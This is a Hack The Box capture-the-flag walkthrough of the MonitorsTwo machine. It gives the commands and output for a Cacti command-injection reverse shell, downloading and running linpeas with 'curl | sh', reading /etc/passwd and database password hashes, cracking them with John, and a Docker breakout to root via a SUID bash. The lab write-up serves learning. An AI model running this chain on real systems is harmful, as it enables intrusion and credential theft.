Hack The Box | MonitorsTwo | Write Up

Hey there, Cyber Warriors! πŸš€

Get ready for a thrilling exploration of MonitorsTwo, a remarkable CTF challenge from Hack The Box! A test of wits and cybersecurity skills, MonitorsTwo takes you on a journey full of learning and discovery. In this post, we’ll share our adventure tackling this machine, focusing on our approach and strategy. So buckle up, as we recount our exciting expedition through MonitorsTwo!

First of all we will perform a NMAP scan:

sudo nmap -sT -n -Pn -sV -T4 -v

After scanning the host we will receive the next result:

22/tcp    open     ssh              OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http             nginx 1.18.0 (Ubuntu)
1042/tcp  filtered afrog
1076/tcp  filtered sns_credit
1864/tcp  filtered paradym-31
9111/tcp  filtered DragonIDSConsole
9929/tcp  filtered nping-echo
16992/tcp filtered amt-soap-http
32776/tcp filtered sometimes-rpc15
62078/tcp filtered iphone-sync
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see the machine has different services but we will check the β€œnginx” service to see which APP is running in the server:

We will see some APP named β€œThe Cacti Group”, now we need to search information about the version and also about this APP to know which is the functionality:

We found a possible vulnerability in the version that is installed but we will look for some exploit in β€œMetasploit”:

search cacti

We will check this exploit β€œexploit/linux/http/cacti_unauthenticated_cmd_injection” to try to obtain a reverse shell but before doing that we will see more information about this exploit:

show options

Now we will to configure some of these parameters:

set RPORT 80
set LPORT 443
set target 0

Now we can exploit the vulnerability and we will receive a reverse shell:

Now we need to enumerate to discover more information to try to gain the user access:

cat /etc/passwd

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

We will see the first hint to know we are into a container (the name of our IP):

cat /etc/hosts       localhost
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters      50bca5e748b0

Now we will use the script β€œLinpeas.sh” to enumerate our machine. To do that we need to download the last release of the script:

curl -L <https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh> >> linpeas.sh

After that we will turn on an HTTP server with python to provide this script into our objective:

python3 -m http.server 80

Once we have our server, we will download the β€œLinpeas.sh” script remotely through our reverse shell:

curl | sh

Apparently we are into a container with docker technology. We know this information because β€œLinpeas.sh” gathered information to say that:


═══════════════════════════════════╣ Container ╠═══════════════════════════════════                                                                                                                                                   
╔══════════╣ Container related tools present (if any):
╔══════════╣ Am I Containered?                                                                                                                                                                                                        
╔══════════╣ Container details                                                                                                                                                                                                        
═╣ Is this a container? ........... docker                                                                                                                                                                                            
═╣ Any running containers? ........ No
╔══════════╣ Docker Container details                                                                                                                                                                                                 
═╣ Am I inside Docker group ....... No                                                                                                                                                                                                
═╣ Looking and enumerating Docker Sockets (if any):
═╣ Docker version ................. Not Found                                                                                                                                                                                         
═╣ Vulnerable to CVE-2019-5736 .... Not Found                                                                                                                                                                                         
═╣ Vulnerable to CVE-2019-13139 ... Not Found                                                                                                                                                                                         
═╣ Rootless Docker? ............... No                                                                                                                                                                                                

╔══════════╣ Container & breakout enumeration
β•š <https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout>                                                                                                                                                    
═╣ Container ID ................... 50bca5e748b0═╣ Container Full ID .............. 50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e                                                                                  
═╣ Seccomp enabled? ............... enabled
═╣ AppArmor profile? .............. docker-default (enforce)
═╣ User proc namespace? ........... enabled         0          0 4294967295
═╣ Vulnerable to CVE-2019-5021 .... No
══╣ Breakout via mounts
β•š <https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts>                                                                                              
═╣ /proc mounted? ................. No                                                                                                                                                                                                
═╣ /dev mounted? .................. No                                                                                                                                                                                                
═╣ Run ushare ..................... No                                                                                                                                                                                                
═╣ release_agent breakout 1........ No                                                                                                                                                                                                
═╣ release_agent breakout 2........ No                                                                                                                                                                                                
═╣ core_pattern breakout .......... No                                                                                                                                                                                                
═╣ binfmt_misc breakout ........... No                                                                                                                                                                                                
═╣ uevent_helper breakout ......... No                                                                                                                                                                                                
═╣ is modprobe present ............ No                                                                                                                                                                                                
═╣ DoS via panic_on_oom ........... No                                                                                                                                                                                                
═╣ DoS via panic_sys_fs ........... No                                                                                                                                                                                                
═╣ DoS via sysreq_trigger_dos ..... No                                                                                                                                                                                                
═╣ /proc/config.gz readable ....... No                                                                                                                                                                                                
═╣ /proc/sched_debug readable ..... Yes                                                                                                                                                                                               
═╣ /proc/*/mountinfo readable ..... No
═╣ /sys/kernel/security present ... Yes                                                                                                                                                                                               
═╣ /sys/kernel/security writable .. No

Also we have the next information about the Files Mounted:

╔══════════╣ Interesting Files Mounted
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/4Z77R4WYM6X4BLW7GXAJOAA4SJ:/var/lib/docker/overlay2/l/Z4RNRWTZKMXNQJVSRJE4P2JYHH:/var/lib/docker/overlay2/l/CXAW6LQU6QOKNSSNURRN2X4JEH:/var/lib/docker/overlay2/l/YWNFANZGTHCUIML4WUIJ5XNBLJ:/var/lib/docker/overlay2/l/JWCZSRNDZSQFHPN75LVFZ7HI2O:/var/lib/docker/overlay2/l/DGNCSOTM6KEIXH4KZVTVQU2KC3:/var/lib/docker/overlay2/l/QHFZCDCLZ4G4OM2FLV6Y2O6WC6:/var/lib/docker/overlay2/l/K5DOR3JDWEJL62G4CATP62ONTO:/var/lib/docker/overlay2/l/FGHBJKAFBSAPJNSTCR6PFSQ7ER:/var/lib/docker/overlay2/l/PDO4KALS2ULFY6MGW73U6QRWSS:/var/lib/docker/overlay2/l/MGUNUZVTUDFYIRPLY5MR7KQ233:/var/lib/docker/overlay2/l/VNOOF2V3SPZEXZHUKR62IQBVM5:/var/lib/docker/overlay2/l/CDCPIX5CJTQCR4VYUUTK22RT7W:/var/lib/docker/overlay2/l/G4B75MXO7LXFSK4GCWDNLV6SAQ:/var/lib/docker/overlay2/l/FRHKWDF3YAXQ3LBLHIQGVNHGLF:/var/lib/docker/overlay2/l/ZDJ6SWVJF6EMHTTO3AHC3FH3LD:/var/lib/docker/overlay2/l/W2EMLMTMXN7ODPSLB2FTQFLWA3:/var/lib/docker/overlay2/l/QRABR2TMBNL577HC7DO7H2JRN2:/var/lib/docker/overlay2/l/7IGVGYP6R7SE3WFLYC3LOBPO4Z:/var/lib/docker/overlay2/l/67QPWIAFA4NXFNM6RN43EHUJ6Q,upperdir=/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/diff,workdir=/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/work,xino=off)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (ro,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (ro,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (ro,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/cpuset type cgroup (ro,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/perf_event type cgroup (ro,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (ro,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (ro,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/memory type cgroup (ro,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/blkio type cgroup (ro,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/rdma type cgroup (ro,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/pids type cgroup (ro,nosuid,nodev,noexec,relatime,pids)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
**/dev/sda2 on /entrypoint.sh type ext4 (rw,relatime)
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime)**
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)
tmpfs on /proc/acpi type tmpfs (ro,relatime)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/sched_debug type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/scsi type tmpfs (ro,relatime)
tmpfs on /sys/firmware type tmpfs (ro,relatime)

Also we will find the next script. We just can read the script but nothing more:

╔══════════╣ Possible Entrypoints
-rw-r--r-- 1 root root 648 Jan  5 11:37 /entrypoint.sh

We will investigate more the β€œ/entrypoint.sh” script to know what it does. This script give us much information. We can enumerate the Mysql service and see the internal information:

set -ex

wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"

chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
        set -- apache2-foreground "$@"

exec "$@"

Linpeas also give to us more information about the Container Capabilites:

╔══════════╣ Container Capabilities
β•š <https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#capabilities-abuse-escape>

Current: cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap=eip

Bounding set =cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap
Ambient set =
Current IAB: cap_chown,!cap_dac_override,!cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,!cap_linux_immutable,cap_net_bind_service,!cap_net_broadcast,!cap_net_admin,cap_net_raw,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,cap_sys_chroot,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_mknod,!cap_lease,cap_audit_write,!cap_audit_control,cap_setfcap,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
secure-no-ambient-raise: no (unlocked)
uid=33(root) euid=0(root)
Guessed mode: UNCERTAIN (0)

Also Linpeas drop to us information about files with the SUID activate:

╔══════════╣ SUID - Check easy privesc, exploits and write perms
β•š <https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid>                                                                                                                                                      
strace Not Found                                                                                                                                                                                                                      
-rwsr-xr-x 1 root root 87K Feb  7  2020 /usr/bin/gpasswd                                                                                                                                                                              
-rwsr-xr-x 1 root root 63K Feb  7  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 52K Feb  7  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 58K Feb  7  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Feb  7  2020 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 31K Oct 14  2020 /sbin/capsh
-rwsr-xr-x 1 root root 55K Jan 20  2022 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 35K Jan 20  2022 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 71K Jan 20  2022 /bin/su

If we check the file β€œ/sbin/capsh” in google we can found the next information about how we can approach this issue to execute a privilege escalation (https://gtfobins.github.io/gtfobins/capsh/):

It can be used to break out from restricted environments by spawning an interactive system shell.

capsh --
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.

sudo install -m =xs $(which capsh) .

./capsh --gid=0 --uid=0 --
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

sudo capsh --

We will execute this method into our reverse shell to check if we can gain root privileges into our shell:

/sbin/capsh --gid=0 --uid=0 --

But apparently this isn’t the way to break out the container. We need to enumerate more. We will to enumerate the cacti database because we have all the information to do that:

mysql --host=db --user=root --password=root cacti -e "show tables"

After executing this command we will see different tables but we need to see the β€œuser_auth” table because it save something special:

mysql --host=db --user=root --password=root cacti -e "select * from user_auth"

We have discovered a new user with hash and that is very interesting:

id      username        password        realm   full_name       email_address   must_change_password    password_change show_tree       show_list       show_preview    graph_settings  login_opts      policy_graphs   policy_trees policy_hosts     policy_graph_templates  enabled lastchange      lastlogin       password_history        locked  failed_attempts lastfail        reset_perms
1       admin   $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC    0       Jamie Thompson  admin@monitorstwo.htb           on      on      on      on      on      2       1       1       1       1       on      -1   -1       -1              0       0       663348655
3       guest   43e9a4ab75570f5b        0       Guest Account           on      on      on      on      on      3       1       1       1       1       1               -1      -1      -1              0       0       0
4       marcus  $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C    0       Marcus Brune    marcus@monitorstwo.htb                  on      on      on      on      1       1       1       1       1       on      -1   -1               on      0       0       2135691668

We can try to do brute force with john the ripper to discover the password for the user β€œmarcus”:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

We have discovered the password for the user β€œmarcus”:

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt  
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
<replaced>      (?)     
1g 0:00:03:06 DONE (2023-05-24 15:23) 0.005353g/s 45.66p/s 45.66c/s 45.66C/s gostosa..figueroa
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We will try if this user and password works through SSH:

ssh marcus@

We will have access to the user flag:

After that we will to check more information to gain root access. The first hint we will see is β€œYou have email”, this message we will see after login through SSH:

We need to go to the mail directory in linux and then we will see the marcus mailbox. After that we can show the content of the mailbox:

From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of

Dear all,

We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.

CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.

CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.

CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.

We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.

Best regards,

Monitor Two
Security Team

The message said that have been discovered recently a few vulnerabilities. After checking two of them I tried the CVE-2021-41091. The explotation of this vulnerability to do privilege escalation is exactly what we need. First of all we need to back to the container where we are root and prepare SUID binary into the container:

chmod u+s /bin/bash

After that we will go to enumerate the directory which the docker container is mounted:

marcus@monitorstwo:/var/mail$ findmnt
TARGET                                SOURCE      FSTYPE      OPTIONS
/                                     /dev/sda2   ext4        rw,relatime
β”œβ”€/sys                                sysfs       sysfs       rw,nosuid,nodev,noexec,relatime
β”‚ β”œβ”€/sys/kernel/security              securityfs  securityfs  rw,nosuid,nodev,noexec,relatime
β”‚ β”œβ”€/sys/fs/cgroup                    tmpfs       tmpfs       ro,nosuid,nodev,noexec,mode=755
β”‚ β”‚ β”œβ”€/sys/fs/cgroup/unified          cgroup2     cgroup2     rw,nosuid,nodev,noexec,relatime,nsdelegate
β”‚ β”‚ β”œβ”€/sys/fs/cgroup/systemd          cgroup      cgroup      rw,nosuid,nodev,noexec,relatime,xattr,name=systemd
β”‚ β”‚ β”œβ”€/sys/fs/cgroup/perf_event       cgroup      cgroup      rw,nosuid,nodev,noexec,relatime,perf_event
β”‚ β”‚ β”œβ”€/sys/fs/cgroup/memory           cgroup      cgroup      rw,nosuid,nodev,noexec,relatime,memory
β”‚ β”‚ β”œβ”€/sys/fs/cgroup/rdma             cgroup      cgroup      rw,nosuid,nodev,noexec,relatime,rdma
β”‚ β”‚ β”œβ”€/sys/fs/cgroup/cpu,cpuacct      cgroup      cgroup      rw,nosuid,nodev,noexec,relatime,cpu,cpuacct
β”‚ β”‚ β”œβ”€/sys/fs/cgroup/blkio            cgroup      cgroup      rw,nosuid,nodev,noexec,relatime,blkio
β”‚ β”‚ β”œβ”€/sys/fs/cgroup/devices          cgroup      cgroup      rw,nosuid,nodev,noexec,relatime,devices
β”‚ β”‚ β”œβ”€/sys/fs/cgroup/freezer          cgroup      cgroup      rw,nosuid,nodev,noexec,relatime,freezer
β”‚ β”‚ β”œβ”€/sys/fs/cgroup/pids             cgroup      cgroup      rw,nosuid,nodev,noexec,relatime,pids
β”‚ β”‚ β”œβ”€/sys/fs/cgroup/cpuset           cgroup      cgroup      rw,nosuid,nodev,noexec,relatime,cpuset
β”‚ β”‚ β”œβ”€/sys/fs/cgroup/net_cls,net_prio cgroup      cgroup      rw,nosuid,nodev,noexec,relatime,net_cls,net_prio
β”‚ β”‚ └─/sys/fs/cgroup/hugetlb          cgroup      cgroup      rw,nosuid,nodev,noexec,relatime,hugetlb
β”‚ β”œβ”€/sys/fs/pstore                    pstore      pstore      rw,nosuid,nodev,noexec,relatime
β”‚ β”œβ”€/sys/fs/bpf                       none        bpf         rw,nosuid,nodev,noexec,relatime,mode=700
β”‚ β”œβ”€/sys/kernel/debug                 debugfs     debugfs     rw,nosuid,nodev,noexec,relatime
β”‚ β”œβ”€/sys/kernel/tracing               tracefs     tracefs     rw,nosuid,nodev,noexec,relatime
β”‚ β”œβ”€/sys/fs/fuse/connections          fusectl     fusectl     rw,nosuid,nodev,noexec,relatime
β”‚ └─/sys/kernel/config                configfs    configfs    rw,nosuid,nodev,noexec,relatime
β”œβ”€/proc                               proc        proc        rw,nosuid,nodev,noexec,relatime
β”‚ └─/proc/sys/fs/binfmt_misc          systemd-1   autofs      rw,relatime,fd=28,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=15271
β”‚   └─/proc/sys/fs/binfmt_misc        binfmt_misc binfmt_misc rw,nosuid,nodev,noexec,relatime
β”œβ”€/dev                                udev        devtmpfs    rw,nosuid,noexec,relatime,size=1966928k,nr_inodes=491732,mode=755
β”‚ β”œβ”€/dev/pts                          devpts      devpts      rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000
β”‚ β”œβ”€/dev/shm                          tmpfs       tmpfs       rw,nosuid,nodev
β”‚ β”œβ”€/dev/hugepages                    hugetlbfs   hugetlbfs   rw,relatime,pagesize=2M
β”‚ └─/dev/mqueue                       mqueue      mqueue      rw,nosuid,nodev,noexec,relatime
β”œβ”€/run                                tmpfs       tmpfs       rw,nosuid,nodev,noexec,relatime,size=402608k,mode=755
β”‚ β”œβ”€/run/lock                         tmpfs       tmpfs       rw,nosuid,nodev,noexec,relatime,size=5120k
β”‚ β”œβ”€/run/docker/netns/4475afc16c8d    nsfs[net:[4026532570]]
β”‚ β”‚                                               nsfs        rw
β”‚ β”œβ”€/run/user/1000                    tmpfs       tmpfs       rw,nosuid,nodev,relatime,size=402608k,mode=700,uid=1000,gid=1000
β”‚ └─/run/docker/netns/8389632fcb75    nsfs[net:[4026532631]]
β”‚                                                 nsfs        rw
β”‚                                     overlay     overlay     rw,relatime,lowerdir=/var/lib/docker/overlay2/l/756FTPFO4AE7HBWVGI5TXU76FU:/var/lib/docker/overlay2/l/XKE4ZK5GJUTHXKVYS4MQMJ3NOB:/var/lib/docker/overlay2/l/3JPYTR54WWK2
β”‚                                     shm         tmpfs       rw,nosuid,nodev,noexec,relatime,size=65536k
β”‚                                     overlay     overlay     rw,relatime,lowerdir=/var/lib/docker/overlay2/l/4Z77R4WYM6X4BLW7GXAJOAA4SJ:/var/lib/docker/overlay2/l/Z4RNRWTZKMXNQJVSRJE4P2JYHH:/var/lib/docker/overlay2/l/CXAW6LQU6QOK
                                      shm         tmpfs       rw,nosuid,nodev,noexec,relatime,size=65536k

After found the directory β€œ/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged” we will perform a β€œDirectory Traversal & Command Execution Attack”. We need to back to the SSH session and execute the next command:

/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p

And finally we will have access to the root flag:

bash-5.1# whoami
bash-5.1# ls /root
cacti  root.txt
bash-5.1# cat root.txt
cat: root.txt: No such file or directory
bash-5.1# cat /root/root.txt

This machine in my opinion has been different. You will learn about how the vulnerabilities can give you fast access to one environment but after that not always you need to exploit some vulnerability to execute privilege escalation. However, it has been interesting because I learned about containers and also how we can breakout.



Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cΓ³mo se procesan los datos de tus comentarios.